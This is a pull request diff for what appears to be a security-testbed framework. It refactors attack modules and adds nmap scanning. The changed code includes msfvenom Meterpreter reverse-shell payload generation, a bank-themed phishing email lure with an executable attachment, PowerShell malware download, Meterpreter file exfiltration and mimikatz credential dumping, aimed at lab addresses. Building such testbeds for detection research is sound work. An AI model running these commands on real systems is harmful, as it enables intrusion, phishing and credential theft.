Merge pull request #68 from fkie-cad/dev

Merge dev into main

.github/workflows/clear-cache.yml

@@ -9,7 +9,7 @@ jobs:
   delete-cache:
     runs-on: [self-hosted, linux]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
 
       - name: Delete cached iso files
         run: rm -rf /usr/share/runner-dependencies/packer_cache/*

.github/workflows/socbed-systemtest-dev.yml

@@ -8,7 +8,7 @@ jobs:
   prepare-environment:
     runs-on: [self-hosted, linux]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
         with:
           ref: dev
 
@@ -29,7 +29,7 @@ jobs:
     needs: [prepare-environment]
     timeout-minutes: 480
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
         with:
           ref: dev
 
@@ -96,7 +96,7 @@ jobs:
     runs-on: [self-hosted, linux]
     needs: [prepare-environment, build-machines]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
         with:
           ref: dev
 
@@ -119,7 +119,7 @@ jobs:
     if: always()
     needs: [prepare-environment, build-machines, test-machines]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
         with:
           ref: dev
 

.github/workflows/socbed-systemtest.yml

@@ -9,7 +9,7 @@ jobs:
   prepare-environment:
     runs-on: [self-hosted, linux]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
 
       - name: Create virtual environment
         run: python3 -m venv /usr/share/runner-dependencies/socbed_env
@@ -31,7 +31,7 @@ jobs:
     needs: [prepare-environment]
     timeout-minutes: 480
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
 
       - name: Activate virtual environment
         run: source /usr/share/runner-dependencies/socbed_env/bin/activate
@@ -96,7 +96,7 @@ jobs:
     runs-on: [self-hosted, linux]
     needs: [prepare-environment, build-machines]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
 
       - name: Activate virtual environment
         run: source /usr/share/runner-dependencies/socbed_env/bin/activate
@@ -117,7 +117,7 @@ jobs:
     if: always()
     needs: [prepare-environment, build-machines, test-machines]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
 
       - name: Delete created VMs
         run: ./tools/delete_vms

.github/workflows/socbed-unittest.yml

@@ -8,6 +8,6 @@ jobs:
   tox-unit-test:
     runs-on: [self-hosted, linux]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
       - run: tox -- -m "not systest"
 

provisioning/ansible/attacker_playbook.yml

@@ -31,3 +31,4 @@
     - generate_malware
     - ssh_config
     - dosfstools
+    - grc

provisioning/ansible/roles/grc/defaults/main.yml

@@ -0,0 +1,2 @@
+---
+grc_version: "1.13.1-1"

provisioning/ansible/roles/grc/tasks/main.yml

@@ -0,0 +1,7 @@
+---
+
+- name: Install grc
+  apt:
+    name: grc={{ grc_version }}
+    state: present
+    update_cache: yes

requirements.txt

@@ -1,6 +1,6 @@
 ansible==5.1.0
 colorama==0.4.1
-paramiko==2.10.1
+paramiko==2.11.0
 pytest==5.2.0
 pyvmomi==6.7.1.2018.12
 pywinrm==0.4.1

src/attacks/__init__.py

@@ -29,7 +29,8 @@
     file.split(".py")[0] for file in os.listdir(module_dir)
     if file.startswith("attack_") and file.endswith(".py")]
 
-attack_modules = [import_module("." + str(attack_module_name), package=package) for attack_module_name in attack_module_names]
+attack_modules = [import_module("." + str(attack_module_name), package=package)
+                  for attack_module_name in attack_module_names]
 
 attack_subclasses = set()
 for attack_module in attack_modules:

src/attacks/attack.py

@@ -20,7 +20,6 @@
 import socket
 from contextlib import contextmanager
 from types import SimpleNamespace
-from signal import SIGINT, default_int_handler, signal
 
 import paramiko
 from attacks.printer import Printer, ListPrinter, MultiPrinter

src/attacks/attack_c2_exfiltration.py

@@ -70,8 +70,9 @@ def _respond(self, line):
             self.handler.shutdown()
 
     def _collect_files(self):
+        path = self.options.path
+        pattern = self.options.pattern
         self.ssh_client.write_lines(self.handler.stdin, [
-            "run file_collector -r -d {path} -f {pattern} -o /root/loot/files.txt".format(
-                path=self.options.path, pattern=self.options.pattern),
+            f"run file_collector -r -d {path} -f {pattern} -o /root/loot/files.txt",
             "run file_collector -i /root/loot/files.txt -l /root/loot",
             "background"])

src/attacks/attack_change_wallpaper.py

@@ -62,6 +62,6 @@ def _respond(self, line):
             self.handler.shutdown()
 
     def _collect_files(self):
-        self.ssh_client.write_lines(self.handler.stdin, [
-            "execute -H -f powershell -a {script}".format(script=self.change_wallpaper_ps_script),
-            "background"])
+        script = self.change_wallpaper_ps_script
+        self.ssh_client.write_lines(self.handler.stdin, [f"execute -H -f powershell -a {script}",
+                                                         "background"])

src/attacks/attack_download_malware.py

@@ -46,8 +46,9 @@ def _set_target(self):
         self.ssh_client.target.username = "ssh"
 
     def _download_command(self):
+        url = self.options.url
+        file = self.options.file
         return (
             "cmd /C powershell -Command $c = new-object System.Net.WebClient; "
-            "$c.DownloadFile(\\\"{url}\\\", \\\"{file}\\\") && "
-            "echo File downloaded successfully.".format(
-                url=self.options.url, file=self.options.file))
+            f"$c.DownloadFile(\\\"{url}\\\", \\\"{file}\\\") && "
+            "echo File downloaded successfully.")

src/attacks/attack_download_malware_meterpreter.py

@@ -64,6 +64,7 @@ def _respond(self, line):
             self.handler.shutdown()
 
     def _collect_files(self):
-        self.ssh_client.write_lines(self.handler.stdin, [
-            "upload {rfile} {file}".format(rfile=self.remote_file, file=self.options.file),
-            "background"])
+        rfile = self.remote_file
+        file = self.options.file
+        self.ssh_client.write_lines(self.handler.stdin, [f"upload {rfile} {file}",
+                                                         "background"])

src/attacks/attack_email_exe.py

@@ -47,32 +47,36 @@ def run(self):
     def _generate_exe_command(self):
         lhost = self.options.lhost
         lport = self.options.lport
-        meterpreter_script = f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe"
+        meterpreter_script = ("msfvenom -p windows/x64/meterpreter/reverse_http "
+                              f"LHOST={lhost} LPORT={lport} -a x64 StagerRetryCount=604800 "
+                              "-f exe-only -o /root/Bank-of-Nuthington.exe")
         return meterpreter_script
 
     def _sendemail_command(self, message):
+        address = self.options.addr
         return " ".join([
             "sendemail",
             "-f attacker@localdomain",
-            "-t {addr}".format(addr=self.options.addr),
+            f"-t {address}",
             "-s 172.18.0.2",
             "-u 'Frozen User Account'",
-            "-m '{msg}'".format(msg=message),
+            f"-m '{message}'",
             "-a '/root/Bank-of-Nuthington.exe'",
             "-o tls=no",
             "-o message-content-type=html",
             "-o message-charset=UTF-8",
             ""])
 
     def _email_body(self):
+        name = self.options.name
         return (
             "<p><img src=\"http://172.18.1.1/email_header.jpg\" width=\"1100\" height=\"300\"></p>"
-            "<p>Dear {name},</p>"
+            f"<p>Dear {name},</p>"
             "<p>our Technical Support Team unfortunately had to freeze your bank account."
             "   Please download and execute the file provided in the attachment for further"
             "   information.</p>"
             "<p>We apologize for the inconvenience caused, and we are really grateful for your"
             "   collaboration. This is an automated e-mail. Please do not respond.</p>"
             "<p><img src=\"http://172.18.1.1/email_footer.jpg\" width=\"90\" height=\"90\"></p>"
             "<p>&copy; 2017 bankofnuthington.co.uk. All Rights Reserved.</p>"
-            "".format(name=self.options.name))
+            "")

src/attacks/attack_flashdrive_exe.py

@@ -49,8 +49,8 @@ def _generate_exe_command(self):
         lhost = self.options.lhost
         lport = self.options.lport
         meterpreter_script = (
-        	f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} "
-        	"-a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
+            f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} "
+            "-a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
         return meterpreter_script
 
     def _generate_image_commands(self):
@@ -69,6 +69,6 @@ def _upload_image_to_client_command(self):
         image_path = self.image_path
         rhost = self.options.rhost
         upload_command = (
-        	f"sshpass -p 'breach' scp {image_path} ssh@{rhost}:/BREACH/ "
-        	"&& echo 'Image file successfully sent'")
+            f"sshpass -p 'breach' scp {image_path} ssh@{rhost}:/BREACH/ "
+            "&& echo 'Image file successfully sent'")
         return upload_command

src/attacks/attack_flashdrive_exfiltration.py

@@ -44,7 +44,8 @@ def _set_target(self):
         self.ssh_client.target.username = "ssh"
 
     def _copy_files_to_flashdrive_commands(self):
+        directory = self.options.rdir
         return [
             "imdisk -a -s 64M -m L: -p \"/fs:ntfs /q /y\"",
-            "xcopy /E \"{dir}\" L:".format(dir=self.options.rdir),
+            f"xcopy /E \"{directory}\" L:",
             "imdisk -D -m L:"]

src/attacks/attack_hashdump.py

@@ -56,7 +56,7 @@ def _handle_output(self):
                 self._respond(line)
                 self.print(line)
         except UnicodeDecodeError as e:
-            self.print("UnicodeDecodeError: {}".format(e))
+            self.print(f"UnicodeDecodeError: {e}")
             self.handler.shutdown()
 
     def _respond(self, line):

src/attacks/attack_mimikatz.py

@@ -54,7 +54,7 @@ def _handle_output(self):
                 self._respond(line)
                 self.print(line)
         except UnicodeDecodeError as e:
-            self.print("UnicodeDecodeError: {}".format(e))
+            self.print(f"UnicodeDecodeError: {e}")
             self.handler.shutdown()
 
     def _respond(self, line):
@@ -76,4 +76,3 @@ def _run_mimikatz(self):
             "load kiwi",
             "creds_all",
             "background"])
-

src/attacks/attack_nmap_host_discovery.py

@@ -0,0 +1,22 @@
+from attacks import Attack, AttackInfo
+from attacks.nmap_attack_options import NmapAttackOptions as AttackOptions
+from attacks.nmap_attack_options import get_speed
+
+
+class NmapHostDiscoveryAttackOptions(AttackOptions):
+    target: str = "Target range or IP"
+
+    def _set_defaults(self) -> None:
+        self.target = "192.168.56.1/23"
+
+
+class NmapHostDiscoveryAttack(Attack):
+    info: AttackInfo = AttackInfo(
+        name="misc_nmap_host_discovery",
+        description="Scan the network for available hosts",
+    )
+    options_class = NmapHostDiscoveryAttackOptions
+
+    def run(self) -> None:
+        command: str = f"nmap -T{get_speed(self.options)} -n -sn {self.options.target}"
+        self.exec_command_on_target(command)

src/attacks/attack_nmap_portscan.py

@@ -0,0 +1,44 @@
+from attacks import Attack, AttackInfo
+from attacks.nmap_attack_options import NmapAttackOptions as AttackOptions
+from attacks.nmap_attack_options import get_speed
+
+
+class NmapPortscanAttackOptions(AttackOptions):
+    target: str = "Target IP or range"
+    scan_type: str = "Scan Type"
+    ports: str = "Ports to scan, set to 'ics' to scan a list of ICS-specific ports"
+
+    def _set_defaults(self) -> None:
+        self.target = "192.168.56.101"
+        self.scan_type = "-sT -sU"
+        self.ports = "top10"
+
+
+class NmapPortscanAttack(Attack):
+    info = AttackInfo(
+        name="misc_nmap_portscan",
+        description="Scan for open ports",
+    )
+    options_class = NmapPortscanAttackOptions
+    ics_ports: str = (
+        "U:47808,20000,34980,2222,44818,55000-55003,1089-1091,34962-34964,4000,161,"
+        + "T:20000,44818,1089-1091,102,502,4840,80,443,34962-34964,4000,2404"
+    )
+
+    def run(self) -> None:
+        port = self._set_port()
+
+        command: str = (
+            f"sudo nmap -T{get_speed(self.options)} -n {self.options.scan_type} "
+            f"{self.options.target}{port}"
+        )
+        self.exec_command_on_target(command)
+
+    def _set_port(self) -> str:
+        if self.options.ports == "ics":
+            return f" -p {self.ics_ports}"
+
+        if self.options.ports.startswith("top"):
+            return f" --top-ports {self.options.ports.strip('top')}"
+
+        return f" -p {self.options.ports}"